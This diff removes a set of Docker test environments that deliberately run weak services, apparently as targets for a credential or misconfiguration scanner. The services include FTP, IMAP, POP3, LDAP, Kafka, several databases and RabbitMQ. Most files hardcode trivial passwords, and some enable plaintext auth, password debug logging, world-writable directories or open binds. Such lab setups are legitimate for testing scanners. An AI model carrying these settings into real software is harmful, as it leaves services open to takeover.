@@ -1,2 +0,0 @@
-docker run -d -p 20:20 -p 21:21 -e FTP_USER=admin  -e FTP_PASS=123456  -e PASV_ADDRESS=127.0.0.1 --name ftp bogem/ftp
-Mac上可能有问题

TestDocker/FTP/docker-compose.yml

@@ -1,16 +0,0 @@
-version: '3'
-services:
-  ftp:
-    image: bogem/ftp
-    container_name: ftp-test
-    environment:
-      - FTP_USER=admin
-      - FTP_PASS=123456
-      - PASV_ADDRESS=127.0.0.1
-      - PASV_MIN_PORT=30000
-      - PASV_MAX_PORT=30100
-    ports:
-      - "21:21"
-      - "20:20"
-      - "30000-30100:30000-30100"
-    restart: unless-stopped

TestDocker/IMAP/Dockerfile

@@ -1,74 +0,0 @@
-FROM ubuntu:20.04
-
-ENV DEBIAN_FRONTEND=noninteractive
-
-# 安装 Dovecot 和工具
-RUN apt-get update && \
-    apt-get install -y dovecot-imapd dovecot-gssapi ssl-cert net-tools procps && \
-    apt-get clean && \
-    rm -rf /var/lib/apt/lists/*
-
-# 创建邮件存储目录和邮箱
-RUN mkdir -p /var/mail/vhosts/ && \
-    chmod 777 /var/mail/vhosts/
-
-# 创建用户和密码文件
-RUN echo "test:{PLAIN}123456" > /etc/dovecot/passwd && \
-    echo "admin:{PLAIN}admin123" >> /etc/dovecot/passwd && \
-    echo "root:{PLAIN}root123" >> /etc/dovecot/passwd && \
-    chown dovecot:dovecot /etc/dovecot/passwd && \
-    chmod 600 /etc/dovecot/passwd
-
-# 配置Dovecot
-RUN echo ' \
-protocols = imap \n\
-listen = * \n\
-ssl = yes \n\
-ssl_cert = </etc/ssl/certs/ssl-cert-snakeoil.pem \n\
-ssl_key = </etc/ssl/private/ssl-cert-snakeoil.key \n\
-mail_location = mbox:~/mail:INBOX=/var/mail/%u \n\
-disable_plaintext_auth = no \n\
-auth_mechanisms = plain login \n\
-auth_debug = yes \n\
-auth_debug_passwords = yes \n\
-mail_debug = yes \n\
-\n\
-passdb { \n\
-  driver = passwd-file \n\
-  args = scheme=PLAIN /etc/dovecot/passwd \n\
-} \n\
-\n\
-userdb { \n\
-  driver = static \n\
-  args = uid=vmail gid=vmail home=/var/mail/%u \n\
-} \n\
-\n\
-service auth { \n\
-  user = dovecot \n\
-  unix_listener auth-userdb { \n\
-    mode = 0600 \n\
-    user = vmail \n\
-  } \n\
-} \n\
-\n\
-service imap-login { \n\
-  inet_listener imap { \n\
-    port = 143 \n\
-  } \n\
-  inet_listener imaps { \n\
-    port = 993 \n\
-    ssl = yes \n\
-  } \n\
-} \n\
-' > /etc/dovecot/dovecot.conf
-
-# 创建vmail用户并设置正确的权限
-RUN groupadd -g 5000 vmail && \
-    useradd -g vmail -u 5000 vmail && \
-    chown -R vmail:vmail /var/mail && \
-    chown -R dovecot:dovecot /etc/dovecot && \
-    chmod -R 644 /etc/dovecot/dovecot.conf
-
-EXPOSE 143 993
-
-CMD ["dovecot", "-F"]

TestDocker/IMAP/README.txt

@@ -1,2 +0,0 @@
-docker build -t weak-imap .
-docker run -d --name imap-test -p 143:143 -p 993:993 weak-imap

TestDocker/Kafka/README.txt

@@ -1 +0,0 @@
-docker-compose up -d

TestDocker/Kafka/docker-compose.yml

@@ -1,22 +0,0 @@
-# docker-compose.yml
-version: '3'
-services:
-  kafka:
-    image: bitnami/kafka:latest
-    ports:
-      - "9092:9092"
-    environment:
-      - KAFKA_CFG_NODE_ID=1
-      - KAFKA_CFG_PROCESS_ROLES=broker,controller
-      - KAFKA_CFG_CONTROLLER_QUORUM_VOTERS=1@kafka:9093
-      - KAFKA_CFG_CONTROLLER_LISTENER_NAMES=CONTROLLER
-      - KAFKA_CFG_LISTENERS=CONTROLLER://:9093,SASL_PLAINTEXT://:9092
-      - KAFKA_CFG_ADVERTISED_LISTENERS=SASL_PLAINTEXT://localhost:9092
-      - KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=CONTROLLER:PLAINTEXT,SASL_PLAINTEXT:SASL_PLAINTEXT
-      - KAFKA_CFG_SASL_ENABLED_MECHANISMS=PLAIN
-      - KAFKA_CFG_SASL_MECHANISM_INTER_BROKER_PROTOCOL=PLAIN
-      - KAFKA_CFG_INTER_BROKER_LISTENER_NAME=SASL_PLAINTEXT
-      - KAFKA_OPTS=-Djava.security.auth.login.config=/opt/bitnami/kafka/config/kafka_jaas.conf
-      - ALLOW_PLAINTEXT_LISTENER=yes
-    volumes:
-      - ./kafka_jaas.conf:/opt/bitnami/kafka/config/kafka_jaas.conf

TestDocker/Kafka/kafka_jaas.conf

@@ -1,8 +0,0 @@
-KafkaServer {
-   org.apache.kafka.common.security.plain.PlainLoginModule required
-   username="admin"
-   password="admin123"
-   user_admin="admin123"
-   user_test="test123"
-   user_kafka="kafka123";
-};

TestDocker/LDAP/Dockerfile

@@ -1,18 +0,0 @@
-FROM osixia/openldap:1.5.0
-
-# 环境变量设置
-ENV LDAP_ORGANISATION="Example Inc"
-ENV LDAP_DOMAIN="example.com"
-ENV LDAP_BASE_DN="dc=example,dc=com"
-# 设置一个弱密码
-ENV LDAP_ADMIN_PASSWORD="Aa123456789"
-# 允许匿名访问
-ENV LDAP_READONLY_USER="true"
-ENV LDAP_READONLY_USER_USERNAME="readonly"
-ENV LDAP_READONLY_USER_PASSWORD="readonly"
-
-# 暴露端口
-EXPOSE 389 636
-
-# 创建初始化脚本
-COPY bootstrap.ldif /container/service/slapd/assets/config/bootstrap/ldif/custom/

TestDocker/LDAP/README.txt

@@ -1,2 +0,0 @@
-docker build -t ldap-weak .
-docker run -d --name ldap-test -p 389:389 -p 636:636 ldap-weak

TestDocker/LDAP/bootstrap.ldif

@@ -1,24 +0,0 @@
-dn: ou=users,dc=example,dc=com
-objectClass: organizationalUnit
-ou: users
-
-dn: cn=admin,ou=users,dc=example,dc=com
-objectClass: inetOrgPerson
-cn: admin
-sn: admin
-uid: admin
-userPassword: admin123
-
-dn: cn=test,ou=users,dc=example,dc=com
-objectClass: inetOrgPerson
-cn: test
-sn: test
-uid: test
-userPassword: test123
-
-dn: cn=root,ou=users,dc=example,dc=com
-objectClass: inetOrgPerson
-cn: root
-sn: root
-uid: root
-userPassword: root123

TestDocker/MSSQL/Dockerfile

@@ -1,14 +0,0 @@
-# 使用SQL Server官方镜像
-FROM mcr.microsoft.com/mssql/server:2022-latest
-
-# 设置环境变量
-ENV ACCEPT_EULA=Y
-ENV MSSQL_SA_PASSWORD=P@ssword123
-ENV MSSQL_PID=Express
-
-# 开放1433端口
-EXPOSE 1433
-
-# 健康检查
-HEALTHCHECK --interval=30s --timeout=3s \
-  CMD /opt/mssql-tools/bin/sqlcmd -S localhost -U sa -P P@ssword123 -Q "SELECT 1" || exit 1

TestDocker/MSSQL/README.txt

@@ -1,5 +0,0 @@
-docker build -t mssql-server .
-docker run -d \
-  -p 1433:1433 \
-  --name mssql-container \
-  mssql-server

TestDocker/Memcached/Dockerfile

@@ -1,11 +0,0 @@
-# 使用Memcached官方镜像
-FROM memcached:latest
-
-# 开放11211端口
-EXPOSE 11211
-
-# 设置启动参数
-# -m 64: 分配64MB内存
-# -c 1024: 最大同时连接数1024
-# -v: 显示版本信息
-CMD ["memcached", "-m", "64", "-c", "1024", "-v"]

TestDocker/Memcached/README.txt

@@ -1,5 +0,0 @@
-docker build -t memcached-server .
-docker run -d \
-  -p 11211:11211 \
-  --name memcached-container \
-  memcached-server

TestDocker/Modbus/README.txt

@@ -1 +0,0 @@
-docker run --rm -p 5020:5020 oitc/modbus-server:latest

TestDocker/Mongodb/Dockerfile

@@ -1,13 +0,0 @@
-# 使用MongoDB官方镜像
-FROM mongo:latest
-
-# 设置环境变量
-ENV MONGO_INITDB_ROOT_USERNAME=admin
-ENV MONGO_INITDB_ROOT_PASSWORD=123456
-
-# 开放27017端口
-EXPOSE 27017
-
-# 健康检查
-HEALTHCHECK --interval=30s --timeout=3s \
-  CMD mongosh --eval 'db.runCommand("ping").ok' localhost:27017/test --quiet

TestDocker/Mongodb/README.txt

@@ -1,5 +0,0 @@
-docker build -t mongodb-server .
-docker run -d \
-  -p 27017:27017 \
-  --name mongodb-container \
-  mongodb-server

TestDocker/MySQL/Dockerfile

@@ -1,17 +0,0 @@
-# 使用MySQL官方镜像
-FROM mysql:latest
-
-# 设置环境变量
-ENV MYSQL_ROOT_PASSWORD=Password
-ENV MYSQL_DATABASE=mydb
-
-# 开放3306端口
-EXPOSE 3306
-
-# MySQL配置
-# 允许远程访问
-COPY my.cnf /etc/mysql/conf.d/my.cnf
-
-# 健康检查
-HEALTHCHECK --interval=30s --timeout=3s \
-  CMD mysql -uroot -p"${MYSQL_ROOT_PASSWORD}" -e "SELECT 1" || exit 1

TestDocker/MySQL/README.txt

@@ -1,2 +0,0 @@
-docker build -t mysql-server .
-docker run -d -p 3306:3306 --name mysql-container mysql-server

TestDocker/MySQL/my.cnf

@@ -1,2 +0,0 @@
-[mysqld]
-bind-address = 0.0.0.0

TestDocker/Neo4j/Dockerfile

@@ -1,9 +0,0 @@
-FROM neo4j:4.4
-
-ENV NEO4J_AUTH=neo4j/123456
-ENV NEO4J_dbms_security_procedures_unrestricted=apoc.*
-ENV NEO4J_dbms_security_auth_enabled=true
-
-EXPOSE 7474 7687
-
-CMD ["neo4j"]

TestDocker/Neo4j/docker-compose.yml

@@ -1,11 +0,0 @@
-version: '3'
-services:
-  neo4j:
-    image: neo4j:4.4
-    ports:
-      - "7474:7474"
-      - "7687:7687"
-    environment:
-      - NEO4J_AUTH=neo4j/123456
-      - NEO4J_dbms_security_auth_enabled=true
-    container_name: neo4j-weak

TestDocker/Oracle/Dockerfile

@@ -1,13 +0,0 @@
-# 使用Oracle官方容器镜像
-FROM container-registry.oracle.com/database/express:21.3.0-xe
-
-# 设置环境变量
-ENV ORACLE_PWD=123456
-ENV ORACLE_CHARACTERSET=AL32UTF8
-
-# 开放1521端口
-EXPOSE 1521 5500
-
-# 健康检查
-HEALTHCHECK --interval=30s --timeout=30s --start-period=5m --retries=3 \
-  CMD nc -z localhost 1521 || exit 1

TestDocker/Oracle/README.txt

@@ -1,11 +0,0 @@
-首先需要在Oracle Container Registry网站注册并接受许可协议：
-https://container-registry.oracle.com
-
-docker login container-registry.oracle.com
-
-docker build -t oracle-db .
-
-docker run -d \
-  -p 1521:1521 \
-  --name oracle-container \
-  oracle-db

TestDocker/POP3/Dockerfile

@@ -1,64 +0,0 @@
-FROM ubuntu:20.04
-
-# 避免交互式提示
-ENV DEBIAN_FRONTEND=noninteractive
-
-# 安装必要的包
-RUN apt-get update && apt-get install -y \
-    dovecot-pop3d \
-    openssl \
-    && rm -rf /var/lib/apt/lists/*
-
-# 生成SSL证书
-RUN openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-    -keyout /etc/ssl/private/dovecot.pem \
-    -out /etc/ssl/certs/dovecot.pem \
-    -subj "/C=US/ST=State/L=City/O=Organization/CN=localhost"
-
-# 配置Dovecot
-RUN echo '\
-protocols = pop3\n\
-listen = *\n\
-ssl = yes\n\
-ssl_cert = </etc/ssl/certs/dovecot.pem\n\
-ssl_key = </etc/ssl/private/dovecot.pem\n\
-auth_mechanisms = plain login\n\
-disable_plaintext_auth = no\n\
-mail_location = mbox:~/mail:INBOX=/var/mail/%u\n\
-\n\
-passdb {\n\
-  driver = passwd-file\n\
-  args = scheme=PLAIN username_format=%u /etc/dovecot/passwd\n\
-}\n\
-\n\
-userdb {\n\
-  driver = passwd-file\n\
-  args = username_format=%u /etc/dovecot/users\n\
-}\n\
-' > /etc/dovecot/dovecot.conf
-
-# 创建密码文件
-RUN echo '\
-admin:{PLAIN}admin123\n\
-test:{PLAIN}test123\n\
-root:{PLAIN}root123\n\
-' > /etc/dovecot/passwd
-
-# 创建用户文件
-RUN echo '\
-admin:x:1000:1000::/home/admin:/bin/false\n\
-test:x:1001:1001::/home/test:/bin/false\n\
-root:x:1002:1002::/home/root:/bin/false\n\
-' > /etc/dovecot/users
-
-# 创建必要的目录和权限
-RUN mkdir -p /home/admin /home/test /home/root && \
-    chown 1000:1000 /home/admin && \
-    chown 1001:1001 /home/test && \
-    chown 1002:1002 /home/root
-
-# 暴露端口
-EXPOSE 110 995
-
-# 启动Dovecot
-CMD ["dovecot", "-F"]

TestDocker/POP3/README.txt

@@ -1,2 +0,0 @@
-docker build -t pop3-test .
-docker run -d --name pop3-server -p 110:110 -p 995:995 pop3-test

TestDocker/Postgre/Dockerfile

@@ -1,14 +0,0 @@
-# 使用PostgreSQL官方镜像
-FROM postgres:latest
-
-# 设置环境变量
-ENV POSTGRES_USER=postgres
-ENV POSTGRES_PASSWORD=123456
-ENV POSTGRES_DB=mydb
-
-# 开放5432端口
-EXPOSE 5432
-
-# 健康检查
-HEALTHCHECK --interval=30s --timeout=3s \
-  CMD pg_isready -U postgres || exit 1

TestDocker/Postgre/README.md

@@ -1,5 +0,0 @@
-docker build -t postgres-server .
-docker run -d \
--p 5432:5432 \
---name postgres-container \
-postgres-server

TestDocker/RabbitMQ/Dockerfile

@@ -1,10 +0,0 @@
-FROM rabbitmq:3-management
-
-# 环境变量设置默认的用户名和密码
-ENV RABBITMQ_DEFAULT_USER=admin
-ENV RABBITMQ_DEFAULT_PASS=123456
-
-# 开放标准端口
-# 5672: AMQP 协议端口
-# 15672: HTTP API 端口和管理UI
-EXPOSE 5672 15672

TestDocker/RabbitMQ/README.txt

@@ -1,2 +0,0 @@
-docker build -t rabbitmq-weak .
-docker run -d --name rabbitmq-test -p 5672:5672 -p 15672:15672 rabbitmq-weak